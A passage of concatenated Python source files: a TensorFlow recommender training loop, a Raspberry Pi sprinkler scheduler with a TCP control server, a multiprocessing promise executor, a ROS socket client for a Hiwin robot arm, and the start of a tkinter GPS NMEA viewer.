feed_dict={user_model.placeholder['clicked_feature']: click_feature_vali[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_vali[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_vali[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_vali[ii],
user_model.placeholder['time']: max_time_vali[ii],
user_model.placeholder['item_size']: news_cnt_short_vali[ii]
})
lock.acquire()
vali_sum[0] += vali_thread_eval[0]
vali_sum[1] += vali_thread_eval[1]
vali_sum[2] += vali_thread_eval[2]
vali_sum[3] += vali_thread_eval[3]
vali_cnt += vali_thread_eval[4]
lock.release()
def multithread_compute_test():
global test_sum, test_cnt
num_sets = cmd_args.num_thread
thread_dist = [[] for _ in xrange(cmd_args.num_thread)]
for ii in xrange(num_sets):
thread_dist[ii % cmd_args.num_thread].append(ii)
test_sum = [0.0, 0.0, 0.0, 0.0]
test_cnt = 0
threads = []
for ii in xrange(cmd_args.num_thread):
thread = threading.Thread(target=test_eval, args=(1, thread_dist[ii]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return test_sum[0]/test_cnt, test_sum[1]/test_cnt, test_sum[2]/test_cnt, test_sum[3]/test_cnt
def test_eval(xx, thread_dist):
global test_sum, test_cnt
test_thread_eval = [0.0, 0.0, 0.0, 0.0]
test_thread_cnt = 0
for ii in thread_dist:
test_set_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_test[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_test[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_test[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_test[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_test[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_test[ii],
user_model.placeholder['time']: max_time_test[ii],
user_model.placeholder['item_size']: news_cnt_short_test[ii]
})
test_thread_eval[0] += test_set_eval[0]
test_thread_eval[1] += test_set_eval[1]
test_thread_eval[2] += test_set_eval[2]
test_thread_eval[3] += test_set_eval[3]
test_thread_cnt += test_set_eval[4]
lock.acquire()
test_sum[0] += test_thread_eval[0]
test_sum[1] += test_thread_eval[1]
test_sum[2] += test_thread_eval[2]
test_sum[3] += test_thread_eval[3]
test_cnt += test_thread_cnt
lock.release()
lock = threading.Lock()
if __name__ == '__main__':
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start" % log_time)
dataset = Dataset(cmd_args)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start construct graph" % log_time)
# restore pre-trained u function
user_model = UserModelLSTM(dataset.f_dim, cmd_args, dataset.max_disp_size)
user_model.construct_placeholder()
with tf.variable_scope('model', reuse=False):
user_model.construct_computation_graph_u()
saved_path = cmd_args.save_dir+'/'
saver = tf.train.Saver(max_to_keep=None)
sess = tf.Session()
sess.run(tf.variables_initializer(user_model.min_trainable_variables))
best_save_path = os.path.join(saved_path, 'best-pre1')
saver.restore(sess, best_save_path)
# construct policy net
train_min_opt, train_max_opt, train_loss_min, train_loss_max, train_prec1, train_prec2, train_loss_min_sum, \
train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt = user_model.construct_computation_graph_policy()
sess.run(tf.initialize_variables(user_model.init_variables))
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, graph completed" % log_time)
batch_size = 100
batch = 100
if cmd_args.dataset == 'lastfm':
batch_size = 10
batch = 10
iterations = cmd_args.num_itrs
# prepare validation data
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare vali data" % log_time)
vali_thread_user, size_user_vali, max_time_vali, news_cnt_short_vali, u_t_dispid_vali, \
u_t_dispid_split_ut_vali, u_t_dispid_feature_vali, click_feature_vali, click_sub_index_vali, \
u_t_clickid_vali, ut_dense_vali = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.vali_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare vali data complete" % log_time)
best_metric = [0.0, 0.0, 0.0, 0.0]
saver = tf.train.Saver(max_to_keep=None)
vali_path = cmd_args.save_dir+'/minmax_L2/'
if not os.path.exists(vali_path):
os.makedirs(vali_path)
for i in xrange(iterations):
training_user = np.random.choice(len(dataset.train_user), batch, replace=False)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare train data" % log_time)
size_user_tr, max_time_tr, news_cnt_short_tr, u_t_dispid_tr, u_t_dispid_split_ut_tr, \
u_t_dispid_feature_tr, click_feature_tr, click_sub_index_tr, u_t_clickid_tr, ut_dense_tr = dataset.data_process_for_placeholder_L2(training_user)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare train data completed" % log_time)
print("%s, start first iteration training" % log_time)
sess.run(train_max_opt, feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration training complete" % log_time)
if np.mod(i, 100) == 0:
loss_prc = sess.run([train_loss_min, train_loss_max, train_prec1, train_prec2], feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start first iteration validation" % log_time)
vali_loss_prc = multithread_compute_vali()
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration validation complete" % log_time)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s: itr%d, training: %.5f, %.5f, %.5f, %.5f, vali: %.5f, %.5f, %.5f, %.5f" %
(log_time, i, loss_prc[0], loss_prc[1], loss_prc[2], loss_prc[3], vali_loss_prc[0], vali_loss_prc[1], vali_loss_prc[2], vali_loss_prc[3]))
if vali_loss_prc[2] > best_metric[2]:
best_metric[2] = vali_loss_prc[2]
best_save_path = os.path.join(vali_path, 'best-pre1')
best_save_path = saver.save(sess, best_save_path)
if vali_loss_prc[3] > best_metric[3]:
best_metric[3] = vali_loss_prc[3]
best_save_path = os.path.join(vali_path, 'best-pre2')
best_save_path = saver.save(sess, best_save_path)
save_path = os.path.join(vali_path, 'most_recent_iter')
save_path = saver.save(sess, save_path)
# test
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare test data" % log_time)
test_thread_user, size_user_test, max_time_test, news_cnt_short_test, u_t_dispid_test, \
u_t_dispid_split_ut_test, u_t_dispid_feature_test, click_feature_test, click_sub_index_test, \
u_t_clickid_test, ut_dense_test = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.test_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare test data end" % log_time)
best_save_path = os.path.join(vali_path, 'best-pre1')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre1!!!, test: %.5f, vali: %.5f" % (test_loss_prc[2], vali_loss_prc[2]))
best_save_path = os.path.join(vali_path, 'best-pre2')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre2!!!, test: %.5f, vali: %.5f" % (test_loss_prc[3], vali_loss_prc[3]))
|
scheduler.py
|
#!/usr/bin/python
import pigpio
from datetime import datetime
import time
import os
from apscheduler.schedulers.background import BackgroundScheduler
import SocketServer
import threading
### TBD
# Start a thread to update variables when notified by settings.py
# Automatic delay when precipitation is reported by forecastio
### Global variables
# Change this to match the GPIO numbers for the pins you connect to your relay board
station = [5,6,12,13,16,19,20,21]
running = False
enabled = True
delay = False
pi = pigpio.pi()
futuretime = time.time()
# Create some custom threading classes here
class ThreadedServer(SocketServer.BaseRequestHandler):
def handle(self):
global running
global enabled
global delay
global futuretime
data = "dummy"
print "Client connected with ", self.client_address
while len(data):
data = self.request.recv(1024)
if data:
print "received " + data + " from client"
# Set the response based on the data
(command,var) = data.split(":")
if "test_run" in command:
if var == "cancel":
running = False
else:
running = True
elif "status" in data:
if enabled == False:
# send the message to the client
self.request.send("disabled:%s" % str(futuretime))
elif running:
self.request.send("running")
else:
self.request.send("stopped")
elif "pause" in data:
scheduler.pause() # What about delay then pause?
enabled = False
delay = False
futuretime = time.time()
elif "resume" in data:
scheduler.resume()
enabled = True
delay = False
elif "delay" in data:
scheduler.pause()
futuretime = time.time() + (float(var) * 3600)
enabled = False
delay = True
else:
self.request.send("error")
print "Client exited"
self.request.close()
if "test_run" in command:
if not var == "cancel":
temp(var)
#test_run(var)
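# Hypothetical examples of the "command:value" strings this handler expects
# from a client (derived from the parsing above; the values are illustrative):
#   "test_run:30"  - cycle each station on for 30 seconds ("test_run:cancel" stops)
#   "status:0"     - reply with "running", "stopped" or "disabled:<timestamp>"
#   "pause:0"      - pause the scheduler indefinitely
#   "resume:0"     - resume the scheduler
#   "delay:2"      - pause the scheduler for 2 hours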
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ThreadingTimer(object):
def __init__(self, interval=30):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
global running
global enabled
global delay
global futuretime
while True:
# Do something
if time.time() >= futuretime and enabled == False and delay == True:
scheduler.resume()
enabled = True
delay = False
time.sleep(self.interval)
# Setup GPIO pins
for i in station:
pi.set_mode(i, pigpio.OUTPUT)
def all_off():
for i in station:
pi.write(i, 1)
def temp(t):
global running
x = 1
while running:
print "Station %s ON" % x
time.sleep(int(t))
print "Station %s OFF" % x
time.sleep(1)
x+=1
if x > len(station):
running = False
all_off()
print "JOB ENDED"
def test_run(t):
global running
running = True
# station holds the GPIO pin numbers themselves, so write to the pin directly
for pin in station:
pi.write(pin, 0)
time.sleep(int(t))
pi.write(pin, 1)
time.sleep(1)
for pin in station:
pi.write(pin, 1)
running = False
# For now, this function is your main program. This will be implemented in program.py later.
def job1():
global running
print("Job 1 running!")
running = True
pi.write(station[0], 0)
time.sleep(600)
pi.write(station[0], 1)
time.sleep(1)
pi.write(station[1], 0)
time.sleep(600)
pi.write(station[1], 1)
time.sleep(1)
pi.write(station[0], 0)
time.sleep(300)
pi.write(station[0], 1)
time.sleep(1)
pi.write(station[1], 0)
time.sleep(300)
pi.write(station[1], 1)
time.sleep(1)
pi.write(station[2], 0)
time.sleep(600)
pi.write(station[2], 1)
time.sleep(1)
pi.write(station[3], 0)
time.sleep(600)
pi.write(station[3], 1)
time.sleep(1)
pi.write(station[4], 0)
time.sleep(600)
pi.write(station[4], 1)
time.sleep(1)
pi.write(station[5], 0)
time.sleep(600)
pi.write(station[5], 1)
time.sleep(1)
pi.write(station[6], 0)
time.sleep(600)
pi.write(station[6], 1)
running = False
if __name__ == '__main__':
# Make sure that all stations are turned off initially
all_off()
scheduler = BackgroundScheduler()
# Change this to manage what days and time you want to run your job
scheduler.add_job(job1, 'cron', day_of_week='mon,wed,fri,sun', hour=6, minute=30)
scheduler.start()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
# Start the watchdog timer before blocking in serve_forever(), otherwise it would never run
timer = ThreadingTimer()
server = ThreadedTCPServer(('', 5555), ThreadedServer)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
finally:
# turn everything off and stop the scheduler on exit
all_off()
server.server_close()
scheduler.shutdown(wait=False)
|
process.py
|
from multiprocessing import Process, Queue
from promise import Promise
from .utils import process
def queue_process(q):
promise, fn, args, kwargs = q.get()
process(promise, fn, args, kwargs)
class ProcessExecutor(object):
def __init__(self):
self.processes = []
self.q = Queue()
def wait_until_finished(self):
for _process in self.processes:
_process.join()
self.q.close()
self.q.join_thread()
def execute(self, fn, *args, **kwargs):
promise = Promise()
self.q.put([promise, fn, args, kwargs], False)
_process = Process(target=queue_process, args=(self.q,))
_process.start()
self.processes.append(_process)
return promise
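# Hypothetical usage sketch (not part of the original module): the function
# and its arguments must be picklable because they are sent to the child
# process through the multiprocessing queue.
#
#   executor = ProcessExecutor()
#   promise = executor.execute(some_function, 1, 2, key="value")
#   executor.wait_until_finished()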
|
Hiwin_RT605_ArmCommand_Socket_20190627160325.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and transmit them to the control PC over a socket
import socket
## Multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' # Initial value of the transmitted data
Arm_feedback = 1 # Assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # Initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # raising StopIteration inside a generator is a RuntimeError on Python 3.7+ (PEP 479)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
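# Hypothetical usage sketch of the switch helper above (values are illustrative):
# an argument-less case() acts as the default branch.
#
#   for case in switch(command):
#       if case(1):
#           handle_one()
#           break
#       if case(2, 3):
#           handle_two_or_three()
#           break
#       if case():
#           handle_default()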
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(x,y,z,pitch,roll,yaw): ## Receive the pose data sent by the strategy side
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## Receive the arm mode data sent by the strategy side
global arm_mode_flag
# use the arguments directly; the original body referenced an undefined `req`
socket_cmd.action = int(action)
socket_cmd.grip = int(grip)
socket_cmd.ra = int(ra)
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## Receive the arm speed mode data sent by the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ## Receive the gripper action data sent by the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## Create the server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##---------- socket packet transmission ----------##
##--------------- socket: transmit arm commands -----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- Set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- Set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- Set arm fast/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## Switch back to the initial mode state
Socket.send(data.encode('utf-8')) # send the command string over the socket
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
# The arm side reports the arm state
if str(feedback_str[2]) == '48':# 'F': the arm is ready to accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# 'T': the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# '6': the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
# Check the sent flag
if str(feedback_str[4]) == '48':# returns 0, false
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':# returns 1, true
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##--------------- socket: transmit arm commands end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## Multithreading
def thread_test():
socket_client()
## Multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## Switch to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # Start the socket client thread
socket_server()
t.join()
|
mainwindow.py
|
"""
A GUI for PY GPS NMEA written with tkinter
"""
import os
import multiprocessing
import threading
import tkinter
import tkinter.filedialog
import tkinter.messagebox
import tkinter.scrolledtext
import tkinter.ttk
import serial
import pygpsnmea.capturefile as capturefile
import pygpsnmea.export as export
import pygpsnmea.kml as kml
import pygpsnmea.nmea as nmea
import pygpsnmea.serialinterface as serialinterface
import pygpsnmea.version as version
import pygpsnmea.gui.exporttab as exporttab
import pygpsnmea.gui.guihelp as guihelp
import pygpsnmea.gui.positionstab as positionstab
import pygpsnmea.gui.serialsettingswindow as serialsettingswindow
import pygpsnmea.gui.statustab as statustab
import pygpsnmea.gui.textboxtab as textboxtab
class StatsWindow(tkinter.Toplevel):
"""
pop out window to display GPS stats
Args:
window(tkinter.Tk): the main window to spawn from
Attributes:
window(tkinter.Tk): window to spawn from
helpbox(HelpTab): help tab with dropdown to select help topics
"""
def __init__(self, window):
tkinter.Toplevel.__init__(self, window)
self.window = window
self.statsbox = textboxtab.TextBoxTab(self)
self.statsbox.pack()
currentstats = self.window.sentencemanager.stats()
displaytxt = export.create_summary_text(currentstats)
self.statsbox.append_text(displaytxt)
class TabControl(tkinter.ttk.Notebook):
"""
organise the main tabs
Note:
tabs go from left to right
Args:
window(tkinter.Tk): the main window this spawns from
Attributes:
window(tkinter.Tk): window to spawn from
statustab(statustab.StatusTab): first tab on the gui
display GPS position status
sentencestab(textboxtab.TextBoxTab): display all the NMEA sentences
positionstab(positionstab.PosRepTab): all the positions in a table
exporttab(exporttab.ExportTab): options to export files from
PY GPS NMEA
"""
def __init__(self, window):
tkinter.ttk.Notebook.__init__(self, window)
self.window = window
self.statustab = statustab.StatusTab(self)
self.add(self.statustab, text='Status')
self.sentencestab = textboxtab.TextBoxTab(self)
self.add(self.sentencestab, text='Sentences')
self.positionstab = positionstab.PosRepTab(self)
self.add(self.positionstab, text='Position Reports')
self.exporttab = exporttab.ExportTab(self)
self.add(self.exporttab, text='Export')
class BasicGUI(tkinter.Tk):
"""
a basic GUI using tkinter to control the program
Attributes:
sentencemanager(nmea.NMEASentenceManager): deals with NMEA sentences
statuslabel(tkinter.Label): forms the status bar at the top of the
main window
serialread(bool): are we reading from the serial device?
serialprocess(multiprocessing.Process): process to read from the
serial device
livemap(bool): are we writing out to a live kml map?
recordedtimes(list): list to hold timestamps
mpq(multiprocessing.Queue): queue to send/receive data
between processes
stopevent(threading.Event): event to stop read from serial device and
thread that updates the GUI displays
updateguithread(threading.Thread): thread used to update displayed
data in the GUI
currentupdatethreadid(int): id of the thread currently used to update
the GUI
tabcontrol(TabControl): object to organise the tabs in the GUI
threadlock(threading.Lock): used by the update thread to lock access to
the data it requires
"""
serialsettings = {'Serial Device': '',
'Baud Rate': 9600,
'Log File Path': '',
'KML File Path': ''}
def __init__(self):
tkinter.Tk.__init__(self)
self.sentencemanager = nmea.NMEASentenceManager()
self.protocol("WM_DELETE_WINDOW", self.quit)
self.title('PY GPS NMEA - ' + version.VERSION)
self.statuslabel = tkinter.Label(self, text='', bg='light grey')
self.statuslabel.pack(fill=tkinter.X)
self.serialread = False
self.serialprocess = None
self.livemap = None
self.recordedtimes = []
self.mpq = multiprocessing.Queue()
self.stopevent = threading.Event()
self.updateguithread = None
self.currentupdatethreadid = None
self.tabcontrol = TabControl(self)
self.tabcontrol.pack(expand=1, fill='both')
self.top_menu()
self.threadlock = threading.Lock()
def clear_gui(self, prompt=True):
"""
clear the gui of all data
Args:
prompt(bool): if true prompt the user before clearing data
default is True
"""
if prompt:
res = tkinter.messagebox.askyesno(
'Clearing GUI', 'Unexported data will be lost, are you sure?')
else:
res = True
if res:
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING',
'Cannot clear GUI whilst reading from the serial device.')
else:
self.statuslabel.config(text='', bg='light grey')
self.tabcontrol.sentencestab.clear()
self.tabcontrol.positionstab.clear()
self.tabcontrol.statustab.clear_stats()
self.sentencemanager.clear_data()
self.update_idletasks()
def serial_settings(self):
"""
open the serial settings window
"""
serialsettingswindow.SerialSettingsWindow(self)
def top_menu(self):
"""
format and add the top menu to the main window
"""
menu = tkinter.Menu(self)
openfileitem = tkinter.Menu(menu, tearoff=0)
openfileitem.add_command(label='Open', command=self.open_file)
openfileitem.add_command(label='Clear GUI', command=self.clear_gui)
openfileitem.add_command(label='Quit', command=self.quit)
settingsitem = tkinter.Menu(menu, tearoff=0)
settingsitem.add_command(
label='Serial Settings', command=self.serial_settings)
settingsitem.add_command(
label='Start read from serial port',
command=self.start_serial_read)
settingsitem.add_command(
label='Stop read from serial port', command=self.stop_serial_read)
helpitem = tkinter.Menu(menu, tearoff=0)
helpitem.add_command(label='Help', command=self.help)
helpitem.add_command(label='Stats', command=self.stats)
menu.add_cascade(label='File', menu=openfileitem)
menu.add_cascade(label='Settings', menu=settingsitem)
menu.add_cascade(label='Info', menu=helpitem)
self.config(menu=menu)
def help(self):
"""
display the help window
"""
guihelp.HelpWindow(self)
def stats(self):
"""
display gps stats
"""
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING', 'Stop reading from the serial device first!')
else:
StatsWindow(self)
def start_serial_read(self):
"""
start reading from a serial device
"""
if self.serialsettings['Serial Device'] == '':
tkinter.messagebox.showwarning(
'Serial Device', 'please specify a serial device to read from')
return
if not os.path.exists(self.serialsettings['Serial Device']):
tkinter.messagebox.showerror(
'Serial Device',
'path to device "{}" does not exist'.format(
self.serialsettings['Serial Device']))
return
try:
serialinterface.test_serial_interface_connection(
self.serialsettings['Serial Device'],
self.serialsettings['Baud Rate'])
except serial.SerialException:
tkinter.messagebox.showerror(
'Serial Device',
'cannot read from serial device "{}"'.format(
self.serialsettings['Serial Device']))
return
if self.serialsettings['KML File Path'] != '':
self.livemap = kml.LiveKMLMap(self.serialsettings['KML File Path'])
self.livemap.create_netlink_file()
self.serialread = True
self.stopevent.clear()
self.updateguithread = threading.Thread(
target=self.updategui, args=(self.stopevent,))
self.updateguithread.daemon = True
if not self.updateguithread.is_alive():
self.updateguithread.start()
self.currentupdatethreadid = self.updateguithread.ident
self.serialprocess = multiprocessing.Process(
target=serialinterface.mp_serial_interface,
args=[self.mpq, self.serialsettings['Serial Device'],
self.serialsettings['Baud Rate']],
kwargs={'logpath': self.serialsettings['Log File Path']})
self.serialprocess.start()
self.statuslabel.config(
text='Reading NMEA sentences from {}'.format(
self.serialsettings['Serial Device']),
fg='black', bg='green2')
def stop_serial_read(self):
"""
stop reading from the serial device
"""
self.serialread = False
self.serialprocess.terminate()
self.serialprocess = None
self.stopevent.set()
self.updateguithread.join(timeout=1)
self.currentupdatethreadid = None
self.updateguithread = None
tkinter.messagebox.showinfo(
'Serial Device', 'Stopped read from {}'.format(
self.serialsettings['Serial Device']))
self.statuslabel.config(text='', bg='light grey')
def open_file(self):
"""
pop open a file browser to allow the user to choose which NMEA 0183
text file they want to process and then process it
"""
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING', 'Stop reading from the serial device first!')
else:
try:
inputfile = tkinter.filedialog.askopenfilename(
filetypes=(("NMEA 0183 text files", "*.txt *.nmea"),))
if inputfile:
self.clear_gui(prompt=False)
self.statuslabel.config(
